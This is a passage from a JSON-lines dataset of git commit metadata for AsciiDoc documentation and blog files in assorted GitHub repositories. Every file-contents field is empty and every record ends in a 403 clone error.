h,mjhennig\/elasticsearch,ulkas\/elasticsearch,myelin\/elasticsearch,weipinghe\/elasticsearch,MetSystem\/elasticsearch,chirilo\/elasticsearch,wittyameta\/elasticsearch,gmarz\/elasticsearch,khiraiwa\/elasticsearch,dylan8902\/elasticsearch,ydsakyclguozi\/elasticsearch,amit-shar\/elasticsearch,easonC\/elasticsearch,nellicus\/elasticsearch,Chhunlong\/elasticsearch,mgalushka\/elasticsearch,JSCooke\/elasticsearch,bestwpw\/elasticsearch,sdauletau\/elasticsearch,truemped\/elasticsearch,yanjunh\/elasticsearch,truemped\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,elancom\/elasticsearch,pritishppai\/elasticsearch,slavau\/elasticsearch,Rygbee\/elasticsearch,mrorii\/elasticsearch,acchen97\/elasticsearch,elasticdog\/elasticsearch,Widen\/elasticsearch,YosuaMichael\/elasticsearch,Fsero\/elasticsearch,EasonYi\/elasticsearch,HonzaKral\/elasticsearch,ESamir\/elasticsearch,petabytedata\/elasticsearch,martinstuga\/elasticsearch,iacdingping\/elasticsearch,fekaputra\/elasticsearch,scottsom\/elasticsearch,iantruslove\/elasticsearch,thecocce\/elasticsearch,zeroctu\/elasticsearch,jimhooker2002\/elasticsearch,lydonchandra\/elasticsearch,queirozfcom\/elasticsearch,trangvh\/elasticsearch,mrorii\/elasticsearch,HonzaKral\/elasticsearch,jeteve\/elasticsearch,pranavraman\/elasticsearch,onegambler\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kalburgimanjunath\/elasticsearch,mjason3\/elasticsearch,camilojd\/elasticsearch,umeshdangat\/elasticsearch,cwurm\/elasticsearch,pozhidaevak\/elasticsearch,koxa29\/elasticsearch,strapdata\/elassandra,Kakakakakku\/elasticsearch,Stacey-Gammon\/elasticsearch,schonfeld\/elasticsearch,gmarz\/elasticsearch,petabytedata\/elasticsearch,jango2015\/elasticsearch,mohit\/elasticsearch,apepper\/elasticsearch,sposam\/elasticsearch,lks21c\/elasticsearch,drewr\/elasticsearch,andrejserafim\/elasticsearch,Chhunlong\/elasticsearch,Charlesdong\/elasticsearch,andrejserafim\/elasticsearch,mm0\/elasticsearch,amaliujia\/elasticsearch,umeshdangat\/elasticsearch,lchennup\/elasticsearch,bestwpw\/elasticsearch,queirozfcom\/elasticsearch,nrkkalyan\/elasticsearch,schonfeld\/elasticsearch,ydsakyclguozi\/elasticsearch,GlenRSmith\/elasticsearch,iantruslove\/elasticsearch,huanzhong\/elasticsearch,bestwpw\/elasticsearch,mortonsykes\/elasticsearch,ckclark\/elasticsearch,jimhooker2002\/elasticsearch,ZTE-PaaS\/elasticsearch,linglaiyao1314\/elasticsearch,mute\/elasticsearch,wangtuo\/elasticsearch,TonyChai24\/ESSource,coding0011\/elasticsearch,Collaborne\/elasticsearch,tsohil\/elasticsearch,wimvds\/elasticsearch,artnowo\/elasticsearch,beiske\/elasticsearch,mnylen\/elasticsearch,milodky\/elasticsearch,mnylen\/elasticsearch,springning\/elasticsearch,umeshdangat\/elasticsearch,palecur\/elasticsearch,kevinkluge\/elasticsearch,queirozfcom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,javachengwc\/elasticsearch,mbrukman\/elasticsearch,jprante\/elasticsearch,smflorentino\/elasticsearch,weipinghe\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,vietlq\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,amaliujia\/elasticsearch,vingupta3\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,sauravmondallive\/elasticsearch,mcku\/elasticsearch,LeoYao\/elasticsearch,tebriel\/elasticsearch,cnfire\/elasticsearch-1,queirozfcom\/elasticsearch,kenshin233\/elasticsearch,ydsakyclguozi\/elasticsearch,javachengwc\/elasticsearch,KimTaehee\/elasticsearch,kalburgimanjunath\/elasticsearch,Liziyao\/elasticsearch,dongjoon-hyun\/elasticsearch,jchampion\/elasticsearch,jpountz\/elasticsearch,huypx1292\/elasticsearch,nomoa\/elasticsearch,davidvgalbraith\/elasticsearch,mmaracic\/elasticsearch,kaneshin\/elasticsearch,dataduke\/elasticsearch,gingerwizard\/elasticsearch,lmtwga\/elasticsearch,masterweb121\/elasticsearch,wangtuo\/elasticsearch,mgalushka\/elasticsearch,lks21c\/elasticsearch,overcome\/elasticsearch,Fsero\/elasticsearch,Widen\/elasticsearch,skearns64\/elasticsearch,StefanGor\/elasticsearch,girirajsharma\/elasticsearch,knight1128\/elasticsearch,markwalkom\/elasticsearch,lmtwga\/elasticsearch,weipinghe\/elasticsearch,wuranbo\/elasticsearch,sarwarbhuiyan\/elasticsearch,slavau\/elasticsearch,Uiho\/elasticsearch,NBSW\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,PhaedrusTheGreek\/elasticsearch,achow\/elasticsearch,bestwpw\/elasticsearch,xingguang2013\/elasticsearch,strapdata\/elassandra5-rc,wittyameta\/elasticsearch,ESamir\/elasticsearch,humandb\/elasticsearch,Chhunlong\/elasticsearch,girirajsharma\/elasticsearch,camilojd\/elasticsearch,iamjakob\/elasticsearch,yongminxia\/elasticsearch,yongminxia\/elasticsearch,zhiqinghuang\/elasticsearch,myelin\/elasticsearch,AshishThakur\/elasticsearch,likaiwalkman\/elasticsearch,gmarz\/elasticsearch,rento19962\/elasticsearch,iantruslove\/elasticsearch,strapdata\/elassandra-test,nazarewk\/elasticsearch,nezirus\/elasticsearch,socialrank\/elasticsearch,btiernay\/elasticsearch,likaiwalkman\/elasticsearch,wayeast\/elasticsearch,andrestc\/elasticsearch,gfyoung\/elasticsearch,nomoa\/elasticsearch,apepper\/elasticsearch,davidvgalbraith\/elasticsearch,socialrank\/elasticsearch,MisterAndersen\/elasticsearch,wittyameta\/elasticsearch,dongjoon-hyun\/elasticsearch,AndreKR\/elasticsearch,ckclark\/elasticsearch,Ansh90\/elasticsearch,pritishppai\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,caengcjd\/elasticsearch,springning\/elasticsearch,ImpressTV\/elasticsearch,ImpressTV\/elasticsearch,petabytedata\/elasticsearch,pozhidaevak\/elasticsearch,sauravmondallive\/elasticsearch,ZTE-PaaS\/elasticsearch,phani546\/elasticsearch,ouyangkongtong\/elasticsearch,koxa29\/elasticsearch,nrkkalyan\/elasticsearch,yynil\/elasticsearch,Charlesdong\/elasticsearch,Rygbee\/elasticsearch,MjAbuz\/elasticsearch,Uiho\/elasticsearch,vingupta3\/elasticsearch,apepper\/elasticsearch,maddin2016\/elasticsearch,kevinkluge\/elasticsearch,yanjunh\/elasticsearch,knight1128\/elasticsearch,vroyer\/elassandra,MetSystem\/elasticsearch,Kakakakakku\/elasticsearch,wenpos\/elasticsearch,Liziyao\/elasticsearch,zeroctu\/elasticsearch,rmuir\/elasticsearch,wangtuo\/elasticsearch,lmtwga\/elasticsearch,springning\/elasticsearch,vingupta3\/elasticsearch,trangvh\/elasticsearch,wayeast\/elasticsearch,nilabhsagar\/elasticsearch,aglne\/elasticsearch,nezirus\/elasticsearch,koxa29\/elasticsearch,Stacey-Gammon\/elasticsearch,wittyameta\/elasticsearch,wangtuo\/elasticsearch,hydro2k\/elasticsearch,nilabhsagar\/elasticsearch,ckclark\/elasticsearch,zkidkid\/elasticsearch,wbowling\/elasticsearch,abibell\/elasticsearch,StefanGor\/elasticsearch,jpountz\/elasticsearch,njlawton\/elasticsearch,liweinan0423\/elasticsearch,alexbrasetvik\/elasticsearch,AndreKR\/elasticsearch,F0lha\/elasticsearch,Charlesdong\/elasticsearch,spiegela\/elasticsearch,MichaelLiZhou\/elasticsearch,kingaj\/elasticsearch,Ansh90\/elasticsearch,kaneshin\/elasticsearch,iamjakob\/elasticsearch,wimvds\/elasticsearch,Kakakakakku\/elasticsearch,iantruslove\/elasticsearch,overcome\/elasticsearch,jprante\/elasticsearch,xingguang2013\/elasticsearch,alexbrasetvik\/elasticsearch,huypx1292\/elasticsearch,GlenRSmith\/elasticsearch,areek\/elasticsearch,strapdata\/elassandra5-rc,EasonYi\/elasticsearch,sdauletau\/elasticsearch,overcome\/elasticsearch,overcome\/elasticsearch,hirdesh2008\/elasticsearch,yuy168\/elasticsearch,JSCooke\/elasticsearch,drewr\/elasticsearch,JackyMai\/elasticsearch,tebriel\/elasticsearch,strapdata\/elassandra5-rc,jango2015\/elasticsearch,brandonkearby\/elasticsearch,milodky\/elasticsearch,18098924759\/elasticsearch,alexbrasetvik\/elasticsearch,slavau\/elasticsearch,masterweb121\/elasticsearch,trangvh\/elasticsearch,palecur\/elasticsearch,YosuaMichael\/elasticsearch,hafkensite\/elasticsearch,fforbeck\/elasticsearch,SergVro\/elasticsearch,liweinan0423\/elasticsearch,mjhennig\/elasticsearch,jeteve\/elasticsearch,fred84\/elasticsearch,xingguang2013\/elasticsearch,lightslife\/elasticsearch,clintongormley\/elasticsearch,nrkkalyan\/elasticsearch,Widen\/elasticsearch,iamjakob\/elasticsearch,wuranbo\/elasticsearch,ThalaivaStars\/OrgRepo1,linglaiyao1314\/elasticsearch,phani546\/elasticsearch,Rygbee\/elasticsearch,queirozfcom\/elasticsearch,ydsakyclguozi\/elasticsearch,milodky\/elasticsearch,djschny\/elasticsearch,JackyMai\/elasticsearch,luiseduardohdbackup\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,diendt\/elasticsearch,coding0011\/elasticsearch,mm0\/elasticsearch,socialrank\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,jango2015\/elasticsearch,andrestc\/elasticsearch,a2lin\/elasticsearch,HarishAtGitHub\/elasticsearch,hanswang\/elasticsearch,tkssharma\/elasticsearch,dataduke\/elasticsearch,vroyer\/elassandra,springning\/elasticsearch,hafkensite\/elasticsearch,kcompher\/elasticsearch,humandb\/elasticsearch,amit-shar\/elasticsearch,nellicus\/elasticsearch,wayeast\/elasticsearch,iacdingping\/elasticsearch,lks21c\/elasticsearch,tahaemin\/elasticsearch,kimimj\/elasticsearch,springning\/elasticsearch,AndreKR\/elasticsearch,LeoYao\/elasticsearch,wuranbo\/elasticsearch,thecocce\/elasticsearch,kenshin233\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,mrorii\/elasticsearch,avikurapati\/elasticsearch,pranavraman\/elasticsearch,Kakakakakku\/elasticsearch,zhiqinghuang\/elasticsearch,vroyer\/elassandra,skearns64\/elasticsearch,hanswang\/elasticsearch,lightslife\/elasticsearch,queirozfcom\/elasticsearch,apepper\/elasticsearch,humandb\/elasticsearch,elasticdog\/elasticsearch,Brijeshrpatel9\/elasticsearch,EasonYi\/elasticsearch,YosuaMichael\/elasticsearch,hydro2k\/elasticsearch,jpountz\/elasticsearch,himanshuag\/elasticsearch,franklanganke\/elasticsearch,alexbrasetvik\/elasticsearch,shreejay\/elasticsearch,dataduke\/elasticsearch,ivansun1010\/elasticsearch,rhoml\/elasticsearch,PhaedrusTheGreek\/elasticsearch,JackyMai\/elasticsearch,Chhunlong\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,i-am-Nathan\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Uiho\/elasticsearch,tsohil\/elasticsearch,humandb\/elasticsearch,dpursehouse\/elasticsearch,lchennup\/elasticsearch,mrorii\/elasticsearch,andrestc\/elasticsearch,nellicus\/elasticsearch,schonfeld\/elasticsearch,karthikjaps\/elasticsearch,ckclark\/elasticsearch,Siddartha07\/elasticsearch,polyfractal\/elasticsearch,masaruh\/elasticsearch,LeoYao\/elasticsearch,wittyameta\/elasticsearch,episerver\/elasticsearch,MetSystem\/elasticsearch,elancom\/elasticsearch,achow\/elasticsearch,onegambler\/elasticsearch,xpandan\/elasticsearch,djschny\/elasticsearch,jbertouch\/elasticsearch,luiseduardohdbackup\/elasticsearch,martinstuga\/elasticsearch,Fsero\/elasticsearch,MjAbuz\/elasticsearch,MetSystem\/elasticsearch,nellicus\/elasticsearch,jsgao0\/elasticsearch,MjAbuz\/elasticsearch,markwalkom\/elasticsearch,mnylen\/elasticsearch,obourgain\/elasticsearch,beiske\/elasticsearch,nomoa\/elasticsearch,davidvgalbraith\/elasticsearch,yuy168\/elasticsearch,MetSystem\/elasticsearch,yongminxia\/elasticsearch,polyfractal\/elasticsearch,winstonewert\/elasticsearch,huanzhong\/elasticsearch,uschindler\/elasticsearch,girirajsharma\/elasticsearch,bawse\/elasticsearch,lzo\/elasticsearch-1,petabytedata\/elasticsearch,nellicus\/elasticsearch,markllama\/elasticsearch,mm0\/elasticsearch,LewayneNaidoo\/elasticsearch,ThalaivaStars\/OrgRepo1,xpandan\/elasticsearch,AshishThakur\/elasticsearch,MisterAndersen\/elasticsearch,djschny\/elasticsearch,18098924759\/elasticsearch,avikurapati\/elasticsearch,JSCooke\/elasticsearch,snikch\/elasticsearch,hirdesh2008\/elasticsearch,Rygbee\/elasticsearch,vroyer\/elasticassandra,Liziyao\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,yanjunh\/elasticsearch,mapr\/elasticsearch,karthikjaps\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_2_0.asciidoc","new_file":"docs\/reference\/migration\/migrate_2_0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22eeee0ddaca322aeb635610b511284753318692","subject":"Re-worked and edited","message":"Re-worked and edited\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/How_it_works.adoc","new_file":"docs\/How_it_works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38f7ce407dbc3cb559436a97577fa40dd90d7ed2","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f439945abb970df4551cb1266701642e74b48f4","subject":"Added IoCs for GreyEnergy","message":"Added IoCs for GreyEnergy\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"greyenergy\/README.adoc","new_file":"greyenergy\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4aea46677f16ad7c46947609327d53c09f0e6072","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fffbc8bb0f2255c06fc553954f1d13543c4936c","subject":"docs: added contributing section for new third-party dependencies","message":"docs: added contributing section for new third-party dependencies\n\nChange-Id: Ic5c8e0feaead7252c0e66ae4aeacac4932be1a10\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/13258\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45bbee6f1553e4705a9f0f62c893c49b0329548b","subject":"y2b create post Audio Mind Blow (Get Your Headphones)","message":"y2b create post Audio Mind Blow (Get Your Headphones)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-28-Audio-Mind-Blow-Get-Your-Headphones.adoc","new_file":"_posts\/2014-02-28-Audio-Mind-Blow-Get-Your-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfe6e9cc6ee5e2abedf38756dc3e906ae5b0bb68","subject":"addtions to NOTES.adoc","message":"addtions to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b2d7ddca1163340f913cf4425d5dba7088e28f6","subject":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","message":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75debc980f0519f624042c42e7dc3daada5e153c","subject":"Update 2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","message":"Update 2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","new_file":"_posts\/2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f911a42ab3a6ebc1d9460b8e1bd6e781f91ff43","subject":"Renamed '_posts\/2020-02-04-SSE-SIMD.adoc' to '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","message":"Renamed '_posts\/2020-02-04-SSE-SIMD.adoc' to '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_file":"_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276c5041846c80b1e592e8b4e8544df739dea1a9","subject":"create post Unboxing The Samsung Galaxy S9 Clone","message":"create post Unboxing The Samsung Galaxy S9 Clone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-The-Samsung-Galaxy-S9-Clone.adoc","new_file":"_posts\/2018-02-26-Unboxing-The-Samsung-Galaxy-S9-Clone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"721ad00cc82bddcc327ffe4a0f0210e1b8764456","subject":"Update 2017-01-25 Test asciidoc.adoc","message":"Update 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a6f1ee9bc474e768e6bc278aa254656bcaec7b2","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6123c264abd355031914539625540da2204582b0","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7060ae67e72ed1cd0f288ee27cb2b515e05a7843","subject":"Job: #11761","message":"Job: #11761\n\nAdd int\n","repos":"keithbrown\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11761\/11761_configurable_graphical_comparison.int.adoc","new_file":"doc-bridgepoint\/notes\/11761\/11761_configurable_graphical_comparison.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c8d866f757b9eb82e42abbf3816443bdc8862df","subject":"Create index-fil.adoc","message":"Create index-fil.adoc\n\nFilipino translation for index.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"index-fil.adoc","new_file":"index-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b030fc03cb434ea0dbb9d16271c2263efaf9ed0","subject":"Update 2018-04-16-When-is-using-a-Blockchain-compelling.adoc","message":"Update 2018-04-16-When-is-using-a-Blockchain-compelling.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5bb3addc61023dbb579121e15c595edf3310653","subject":"Update 2015-07-13-Playing-with-Source-Maps.adoc","message":"Update 2015-07-13-Playing-with-Source-Maps.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-07-13-Playing-with-Source-Maps.adoc","new_file":"_posts\/2015-07-13-Playing-with-Source-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e66c93b8cafe566bb12d545c62205cd79ffb4bf4","subject":"Update 2018-02-08-Accessibility-in-a-modal.adoc","message":"Update 2018-02-08-Accessibility-in-a-modal.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-02-08-Accessibility-in-a-modal.adoc","new_file":"_posts\/2018-02-08-Accessibility-in-a-modal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37362320def2257bba808b1acdb4f843316ebe56","subject":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","message":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","new_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb2fd40a85e7f1834b331ed9bea424f50f1b9e21","subject":"Update 2016-03-01-Ride-the-Nashorn.adoc","message":"Update 2016-03-01-Ride-the-Nashorn.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2016-03-01-Ride-the-Nashorn.adoc","new_file":"_posts\/2016-03-01-Ride-the-Nashorn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9d60466b08b140754ff9948af38360ab4bd43ea","subject":"Deleted _posts\/2016-06-18-Non-secure-icons.adoc","message":"Deleted 